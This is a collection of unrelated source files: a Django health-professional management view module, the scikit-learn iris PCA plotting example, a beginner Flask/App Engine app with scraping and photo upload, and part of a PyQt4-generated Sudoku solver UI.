            # remember the POSTed criteria for the back button
            if self.request.POST:
                self.request.session['last_search'] = self.request.POST
            healthprofessionals = []
            for user in users:
                healthprofessionals.append(user.healthperson)
        self.healthprofessionals = healthprofessionals
        return super(HealthProfessionalSearchView,
                     self).get(self.request, *self.args, **self.kwargs)
class HealthProfessionalAddView(BaseAddView):
    """
    Class based view for adding a new healthprofessional.

    On success the manager is redirected to the personalia page of the
    newly created healthprofessional.
    """
    template_name = 'healthprofessional/add.html'
    form_class = HealthProfessionalAddForm

    @method_decorator(login_required)
    @method_decorator(user_passes_test(
        is_allowed_manager, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # BUG FIX: this used to assign ``self.succes_url`` (typo), which
        # created a dead attribute instead of setting the intended default
        # success URL.
        self.success_url = reverse('index')
        return super(HealthProfessionalAddView, self).dispatch(*args, **kwargs)

    def form_valid(self, form):
        """Create the User + HealthProfessional pair and start onboarding."""
        user = self.get_user_for_form(form)
        healthprofessional = HealthProfessional()
        healthprofessional.function = form.cleaned_data['function']
        healthprofessional.specialism = form.cleaned_data['specialism']
        healthprofessional.telephone = form.cleaned_data['telephone']
        # add to healthprofessionals group
        user.groups = [Group.objects.get(name='healthprofessionals')]
        healthprofessional.changed_by_user = self.request.user
        healthprofessional.save()
        user.healthperson = healthprofessional
        user.save()
        # E-mail the new user a password (change) request.
        sent_password_change_request(user, self.url_prefix, False, True)
        # Store the healthperson id in the session under a random key so
        # the redirect URL does not expose the real id.
        healthprofessional_session_id = randomkey()
        self.request.session[healthprofessional_session_id] =\
            'storage_{0}'.format(healthprofessional.health_person_id)
        self.success_url = reverse('healthprofessional_view_personalia',
                                   args=(healthprofessional_session_id,))
        return super(HealthProfessionalAddView, self).form_valid(form)
class HealthProfessionalRemove(HealthProfessionalBaseView, TemplateView):
    """
    Remove the healthprofessional by setting the deleted_on attribute
    on the coupled :class:`apps.account.models.User` instance.
    """
    template_name = 'healthprofessional/remove_confirmation.html'

    @method_decorator(user_passes_test(is_allowed_manager,
                      login_url=login_url))
    def dispatch(self, *args, **kwargs):
        self.cancel_url = reverse('healthprofessional_search')
        return super(HealthProfessionalRemove, self).dispatch(*args, **kwargs)

    def post(self, request, *args, **kwargs):
        """
        Soft-delete the healthprofessional: flag the coupled user account
        as deleted, disable its password and deactivate it.
        """
        account = self.healthprofessional.user
        account.deleted_on = date.today()
        account.set_unusable_password()
        account.is_active = False
        account.changed_by_user = self.request.user
        account.save()
        return HttpResponseRedirect(self.cancel_url)

    def get_context_data(self, **kwargs):
        context = super(HealthProfessionalRemove,
                        self).get_context_data(**kwargs)
        context['cancel_url'] = self.cancel_url
        return context
| acesonl/remotecare | remotecare/apps/healthperson/healthprofessional/views.py | Python | gpl-3.0 | 30,894 |
# Modules re-exported on ``from <package> import *``.
__all__ = ['ttypes', 'constants', 'rataservice']
| leonidas/roboio | tests/servers/gen-py/rataservice/__init__.py | Python | lgpl-2.1 | 49 |
# -*- coding: utf-8 -*-
"""
=========================================================
The Iris Dataset
=========================================================
This data sets consists of 3 different types of irises'
(Setosa, Versicolour, and Virginica) petal and sepal
length, stored in a 150x4 numpy.ndarray
The rows being the samples and the columns being:
Sepal Length, Sepal Width, Petal Length and Petal Width.
The below plot uses the first two features.
See `here <https://en.wikipedia.org/wiki/Iris_flower_data_set>`_ for more
information on this dataset.
"""
# Code source: Gaël Varoquaux
# Modified for documentation by Jaques Grobler
# License: BSD 3 clause
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.decomposition import PCA
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2]  # we only take the first two features.
y = iris.target

# Pad the axis limits slightly so points are not drawn on the border.
x_min, x_max = X[:, 0].min() - 0.5, X[:, 0].max() + 0.5
y_min, y_max = X[:, 1].min() - 0.5, X[:, 1].max() + 0.5

plt.figure(2, figsize=(8, 6))
plt.clf()

# Plot the training points, colored by class label.
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor="k")
plt.xlabel("Sepal length")
plt.ylabel("Sepal width")

plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())

# To getter a better understanding of interaction of the dimensions
# plot the first three PCA dimensions
fig = plt.figure(1, figsize=(8, 6))
ax = fig.add_subplot(111, projection="3d", elev=-150, azim=110)

X_reduced = PCA(n_components=3).fit_transform(iris.data)
ax.scatter(
    X_reduced[:, 0],
    X_reduced[:, 1],
    X_reduced[:, 2],
    c=y,
    cmap=plt.cm.Set1,
    edgecolor="k",
    s=40,
)

ax.set_title("First three PCA directions")
ax.set_xlabel("1st eigenvector")
# BUG FIX: ``Axes3D.w_xaxis``/``w_yaxis``/``w_zaxis`` were deprecated and
# removed in Matplotlib 3.8; ``ax.xaxis`` etc. are the supported spellings.
ax.xaxis.set_ticklabels([])
ax.set_ylabel("2nd eigenvector")
ax.yaxis.set_ticklabels([])
ax.set_zlabel("3rd eigenvector")
ax.zaxis.set_ticklabels([])

plt.show()
| manhhomienbienthuy/scikit-learn | examples/datasets/plot_iris_dataset.py | Python | bsd-3-clause | 1,939 |
from flask import render_template, Flask, request, redirect, url_for, current_app
from app import app
import urllib2
from bs4 import BeautifulSoup
from flaskext import wtf
from flaskext.wtf import Form, TextField, TextAreaField, \
SubmitField, validators, ValidationError, IntegerField
from google.appengine.ext import db
import json
import sys
# NOTE(review): forcing the interpreter-wide default encoding is a known
# Python 2 hack — ``sys.setdefaultencoding`` is deleted by ``site.py`` and
# only reappears after ``reload(sys)``. It can mask real encoding bugs and
# does not exist on Python 3.
reload(sys)
sys.setdefaultencoding('utf-8')
class ContactForm(Form):
    """Contact form with name, e-mail address, subject and message fields."""
    name = TextField("Name", [validators.Required("Please enter your name.")])
    email = TextField(
        "Email", [validators.Required("Please enter email address."),
                  validators.Email("Please enter valid email address.")])
    subject = TextField(
        "Subject", [validators.Required("Please enter a subject.")])
    # BUG FIX: the validation message said "subject" (copy/paste error from
    # the field above); it now correctly asks for a message.
    message = TextAreaField(
        "Message", [validators.Required("Please enter a message.")])
    submit = SubmitField("Send")
class Tweet(db.Model):
    """App Engine datastore model holding one uploaded photo and a comment."""
    photo = db.BlobProperty()
    comment = db.StringProperty()

    def setPhoto(self, filestream):
        # Wrap the raw upload bytes in a Blob so the datastore accepts them.
        self.photo = db.Blob(filestream)

    def setExif(self, exif):
        # NOTE(review): ``exif`` is not declared as a model property above,
        # so this JSON string lives only on the in-memory instance and is
        # presumably NOT persisted by ``put()`` — confirm before relying
        # on getExif() after a datastore round-trip.
        self.exif = json.dumps(exif)

    def getExif(self):
        return json.loads(self.exif)
class TweetURL(object):
    """Plain value object pairing a photo URL with its comment text."""

    def __init__(self, url='', comment=''):
        # Instance attributes instead of the previous class attributes:
        # class-level defaults are shared by every instance, which invites
        # accidental shared state. ``TweetURL()`` still yields the same
        # ``''`` defaults, so existing callers are unaffected.
        self.url = url
        self.comment = comment
@app.route('/')
@app.route('/index')
def index():
    """Render the demo index page with a few sample template variables."""
    number = 123
    mixed_values = [123, '353', 'abc']
    return render_template('index.html', a=number, b=mixed_values, c='ccc')
@app.route('/hi', methods=['GET', 'POST'])
def hi():
    """Echo one GET parameter and two POST parameters back to the page."""
    get_value = request.args.get("get1") if request.method == 'GET' else None
    post_value1 = post_value2 = None
    if request.method == 'POST':
        post_value1 = request.form.get("post1")
        post_value2 = request.form.get("post2")
    return render_template('hi.html',
                           get_val=get_value,
                           post_val1=post_value1,
                           post_val2=post_value2)
@app.route('/first', methods=['GET'])
def first():
    """Search-portal page: forward the query to the chosen search engine.

    The ``get`` parameter carries the query; whichever of ``google``,
    ``naver`` or ``daum`` is set picks the engine to redirect to.
    """
    if request.method == 'GET':
        query = request.args.get("get")
        # BUG FIX: the original used backslash line-continuations *inside*
        # the string literals, which baked the next line's indentation
        # whitespace into the redirect URLs. Adjacent string literals are
        # concatenated instead, keeping the URLs intact.
        if request.args.get("google"):
            return redirect(
                'https://www.google.co.kr/?gws_rd=ssl'
                '#newwindow=1&q=' + query)
        if request.args.get("naver"):
            return redirect(
                'http://search.naver.com/search.naver'
                '?where=nexearch&query=' + query)
        if request.args.get("daum"):
            return redirect(
                'http://search.daum.net/search?w=tot&DA=YZR'
                '&t__nil_searchbox=btn&sug=&o=&q=' + query)
    return render_template('first.html')
@app.route('/second', methods=['GET'])
def second():
    """Scrape a user-supplied URL and list the text of matching elements.

    Query parameters:
        url      -- page to fetch (must start with ``http://``)
        tagName  -- CSS selector base (tag name)
        classTag -- if set, select by class (``.tagName``)
        idTag    -- if set, select by id (``#tagName``)
    """
    if request.method == 'GET' and request.args:
        htmlSource = request.args.get("url")
        # url exception
        # Rejects anything not starting with plain ``http://`` (note this
        # also rejects https URLs).
        if htmlSource[0:7] != "http://":
            return render_template("second.html")
        tagName = request.args.get("tagName")
        if request.args.get("classTag"):
            tagName = "." + tagName
        if request.args.get("idTag"):
            tagName = "#" + tagName
        htmltext = urllib2.urlopen(htmlSource).read()
        soup = BeautifulSoup(htmltext, from_encoding="utf-8")
        arr = []
        # Collect the visible text of every element matching the selector.
        for tag in soup.select(tagName):
            arr.append(tag.get_text())
        return render_template('second.html', arr=arr)
    else:
        return render_template('second.html')
@app.route('/index1')
def index1():
    """Serve the ``index1.html`` template as-is."""
    template_name = 'index1.html'
    return render_template(template_name)
@app.route('/third', methods=['GET', 'POST'])
def third():
    """Show the contact form; greet the sender once it validates."""
    form = ContactForm()
    if request.method != 'POST':
        return render_template('third.html', form=form)
    if form.validate():
        return "Nice to meet you, " + form.name.data + "!"
    return render_template('third.html', form=form)
class NaverForm(Form):
    """Form asking for a Naver news section (genre) number to crawl."""
    genre = IntegerField(
        "genre", [validators.Required("Please enter genre number.")])
    submit = SubmitField("Send")
@app.route('/forth', methods=['GET', 'POST'])
def forth():
    """Crawl Naver news headlines for the section number posted in the form.

    Renders the first ten non-trivial headline texts.
    """
    form = NaverForm()
    if request.method == 'POST':
        if not form.validate():
            return render_template('forth.html', form=form)
        else:
            # crawl
            # ``sid1`` selects the Naver news section to list.
            url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(form.genre.data)
            htmltext = urllib2.urlopen(url).read()
            soup = BeautifulSoup(htmltext, from_encoding="utf-8")
            arr = []
            # arr1 = []
            # Headline anchors carry the 'nclicks(fls.list)' class on Naver.
            titles = soup.find_all('a', 'nclicks(fls.list)')
            for tag in titles:
                # arr1.append(len(tag.get_text()))
                # Skip icon-only / near-empty anchors.
                if len(tag.get_text()) > 2:
                    arr.append(tag.get_text())
            return render_template('forth.html', arr=arr[:10], form=form,
                                   titles=titles)
    return render_template('forth.html', form=form)
@app.route('/tweet', methods=['GET', 'POST'])
def tweet():
    """Photo-tweet page: store an uploaded photo + comment, list all tweets."""
    if request.form:
        upload_data = Tweet()
        if request.files.get('photo'):
            post_photo = request.files.get('photo')
            filestream = post_photo.read()
            upload_data.photo = db.Blob(filestream)
            # print post_photo
        post_comment = request.form.get('comment')
        upload_data.comment = post_comment
        upload_data.put()
    # Build (url, comment) pairs for the template; tweets without a photo
    # keep the default empty url.
    tweetURLs = []
    for tweet in Tweet.all():
        tweetURL = TweetURL()
        if tweet.photo:
            tweetURL.url = url_for("show", key=tweet.key())
        tweetURL.comment = tweet.comment
        tweetURLs.append(tweetURL)
    return render_template('tweet.html', tweetURLs=tweetURLs)
@app.route('/show/<key>', methods=['GET'])
def show(key):
    """Stream the stored photo blob for the given datastore key."""
    entity = db.get(key)
    return current_app.response_class(entity.photo)
@app.errorhandler(404)
def page_not_found(e):
    """Return a custom 404 error."""
    message = 'Sorry, nothing at this URL.'
    return message, 404
| kho0810/likelion_Web | app/views.py | Python | apache-2.0 | 5,752 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_sudoku_solver.ui'
#
# Created: Mon Dec 30 21:16:20 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
    # PyQt4 with the legacy QString API: use Qt's own UTF-8 conversion.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # QString is absent (sip API v2 / Python 3 strings): pass through as-is.
    def _fromUtf8(s):
        return s
try:
    # Older PyQt4: QApplication.translate() takes an explicit encoding.
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt4 dropped the UnicodeUTF8 constant and the encoding argument.
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(805, 543)
MainWindow.setDockOptions(QtGui.QMainWindow.AllowTabbedDocks|QtGui.QMainWindow.AnimatedDocks)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.widget = QtGui.QWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget.sizePolicy().hasHeightForWidth())
self.widget.setSizePolicy(sizePolicy)
self.widget.setToolTip(_fromUtf8(""))
self.widget.setStyleSheet(_fromUtf8(""))
self.widget.setObjectName(_fromUtf8("widget"))
self.sudokugrid = SudokuGrid(self.widget)
self.sudokugrid.setGeometry(QtCore.QRect(0, 0, 491, 461))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sudokugrid.sizePolicy().hasHeightForWidth())
self.sudokugrid.setSizePolicy(sizePolicy)
self.sudokugrid.setToolTip(_fromUtf8(""))
self.sudokugrid.setFrameShape(QtGui.QFrame.NoFrame)
self.sudokugrid.setFrameShadow(QtGui.QFrame.Raised)
self.sudokugrid.setLineWidth(1)
self.sudokugrid.setObjectName(_fromUtf8("sudokugrid"))
self.gridLayout_10 = QtGui.QGridLayout(self.sudokugrid)
self.gridLayout_10.setMargin(0)
self.gridLayout_10.setObjectName(_fromUtf8("gridLayout_10"))
self.mainGridLayout = QtGui.QGridLayout()
self.mainGridLayout.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.mainGridLayout.setObjectName(_fromUtf8("mainGridLayout"))
self.gridLayout_5 = QtGui.QGridLayout()
self.gridLayout_5.setSpacing(0)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.label_3_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_3.sizePolicy().hasHeightForWidth())
self.label_3_3.setSizePolicy(sizePolicy)
self.label_3_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_3.setFont(font)
self.label_3_3.setAutoFillBackground(False)
self.label_3_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_3.setFrameShape(QtGui.QFrame.Panel)
self.label_3_3.setLineWidth(1)
self.label_3_3.setText(_fromUtf8(""))
self.label_3_3.setTextFormat(QtCore.Qt.PlainText)
self.label_3_3.setScaledContents(False)
self.label_3_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_3.setObjectName(_fromUtf8("label_3_3"))
self.gridLayout_5.addWidget(self.label_3_3, 0, 0, 1, 1)
self.label_5_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_3.sizePolicy().hasHeightForWidth())
self.label_5_3.setSizePolicy(sizePolicy)
self.label_5_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_3.setFont(font)
self.label_5_3.setAutoFillBackground(False)
self.label_5_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_3.setFrameShape(QtGui.QFrame.Panel)
self.label_5_3.setText(_fromUtf8(""))
self.label_5_3.setTextFormat(QtCore.Qt.PlainText)
self.label_5_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_3.setObjectName(_fromUtf8("label_5_3"))
self.gridLayout_5.addWidget(self.label_5_3, 2, 0, 1, 1)
self.label_4_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_4.sizePolicy().hasHeightForWidth())
self.label_4_4.setSizePolicy(sizePolicy)
self.label_4_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_4.setFont(font)
self.label_4_4.setAutoFillBackground(False)
self.label_4_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_4.setFrameShape(QtGui.QFrame.Panel)
self.label_4_4.setText(_fromUtf8(""))
self.label_4_4.setTextFormat(QtCore.Qt.PlainText)
self.label_4_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_4.setObjectName(_fromUtf8("label_4_4"))
self.gridLayout_5.addWidget(self.label_4_4, 1, 1, 1, 1)
self.label_4_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_3.sizePolicy().hasHeightForWidth())
self.label_4_3.setSizePolicy(sizePolicy)
self.label_4_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_3.setFont(font)
self.label_4_3.setAutoFillBackground(False)
self.label_4_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_3.setFrameShape(QtGui.QFrame.Panel)
self.label_4_3.setText(_fromUtf8(""))
self.label_4_3.setTextFormat(QtCore.Qt.PlainText)
self.label_4_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_3.setObjectName(_fromUtf8("label_4_3"))
self.gridLayout_5.addWidget(self.label_4_3, 1, 0, 1, 1)
self.label_5_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_4.sizePolicy().hasHeightForWidth())
self.label_5_4.setSizePolicy(sizePolicy)
self.label_5_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_4.setFont(font)
self.label_5_4.setAutoFillBackground(False)
self.label_5_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_4.setFrameShape(QtGui.QFrame.Panel)
self.label_5_4.setText(_fromUtf8(""))
self.label_5_4.setTextFormat(QtCore.Qt.PlainText)
self.label_5_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_4.setObjectName(_fromUtf8("label_5_4"))
self.gridLayout_5.addWidget(self.label_5_4, 2, 1, 1, 1)
self.label_3_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_5.sizePolicy().hasHeightForWidth())
self.label_3_5.setSizePolicy(sizePolicy)
self.label_3_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_5.setFont(font)
self.label_3_5.setAutoFillBackground(False)
self.label_3_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_5.setFrameShape(QtGui.QFrame.Panel)
self.label_3_5.setText(_fromUtf8(""))
self.label_3_5.setTextFormat(QtCore.Qt.PlainText)
self.label_3_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_5.setObjectName(_fromUtf8("label_3_5"))
self.gridLayout_5.addWidget(self.label_3_5, 0, 2, 1, 1)
self.label_4_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_5.sizePolicy().hasHeightForWidth())
self.label_4_5.setSizePolicy(sizePolicy)
self.label_4_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_5.setFont(font)
self.label_4_5.setAutoFillBackground(False)
self.label_4_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_4_5.setFrameShape(QtGui.QFrame.Panel)
self.label_4_5.setText(_fromUtf8(""))
self.label_4_5.setTextFormat(QtCore.Qt.PlainText)
self.label_4_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_5.setObjectName(_fromUtf8("label_4_5"))
self.gridLayout_5.addWidget(self.label_4_5, 1, 2, 1, 1)
self.label_5_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_5.sizePolicy().hasHeightForWidth())
self.label_5_5.setSizePolicy(sizePolicy)
self.label_5_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_5.setFont(font)
self.label_5_5.setAutoFillBackground(False)
self.label_5_5.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_5_5.setFrameShape(QtGui.QFrame.Panel)
self.label_5_5.setText(_fromUtf8(""))
self.label_5_5.setTextFormat(QtCore.Qt.PlainText)
self.label_5_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_5.setObjectName(_fromUtf8("label_5_5"))
self.gridLayout_5.addWidget(self.label_5_5, 2, 2, 1, 1)
self.label_3_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_4.sizePolicy().hasHeightForWidth())
self.label_3_4.setSizePolicy(sizePolicy)
self.label_3_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_4.setFont(font)
self.label_3_4.setAutoFillBackground(False)
self.label_3_4.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_4.setFrameShape(QtGui.QFrame.Panel)
self.label_3_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_4.setText(_fromUtf8(""))
self.label_3_4.setTextFormat(QtCore.Qt.PlainText)
self.label_3_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_4.setObjectName(_fromUtf8("label_3_4"))
self.gridLayout_5.addWidget(self.label_3_4, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_5, 1, 1, 1, 1)
self.gridLayout_9 = QtGui.QGridLayout()
self.gridLayout_9.setSpacing(0)
self.gridLayout_9.setObjectName(_fromUtf8("gridLayout_9"))
self.label_7_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_6.sizePolicy().hasHeightForWidth())
self.label_7_6.setSizePolicy(sizePolicy)
self.label_7_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_6.setFont(font)
self.label_7_6.setAutoFillBackground(False)
self.label_7_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_6.setFrameShape(QtGui.QFrame.Panel)
self.label_7_6.setText(_fromUtf8(""))
self.label_7_6.setTextFormat(QtCore.Qt.PlainText)
self.label_7_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_6.setObjectName(_fromUtf8("label_7_6"))
self.gridLayout_9.addWidget(self.label_7_6, 1, 0, 1, 1)
self.label_6_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_8.sizePolicy().hasHeightForWidth())
self.label_6_8.setSizePolicy(sizePolicy)
self.label_6_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_8.setFont(font)
self.label_6_8.setAutoFillBackground(False)
self.label_6_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_8.setFrameShape(QtGui.QFrame.Panel)
self.label_6_8.setText(_fromUtf8(""))
self.label_6_8.setTextFormat(QtCore.Qt.PlainText)
self.label_6_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_8.setObjectName(_fromUtf8("label_6_8"))
self.gridLayout_9.addWidget(self.label_6_8, 0, 2, 1, 1)
self.label_8_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_6.sizePolicy().hasHeightForWidth())
self.label_8_6.setSizePolicy(sizePolicy)
self.label_8_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_6.setFont(font)
self.label_8_6.setAutoFillBackground(False)
self.label_8_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_6.setFrameShape(QtGui.QFrame.Panel)
self.label_8_6.setText(_fromUtf8(""))
self.label_8_6.setTextFormat(QtCore.Qt.PlainText)
self.label_8_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_6.setObjectName(_fromUtf8("label_8_6"))
self.gridLayout_9.addWidget(self.label_8_6, 2, 0, 1, 1)
self.label_7_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_7.sizePolicy().hasHeightForWidth())
self.label_7_7.setSizePolicy(sizePolicy)
self.label_7_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
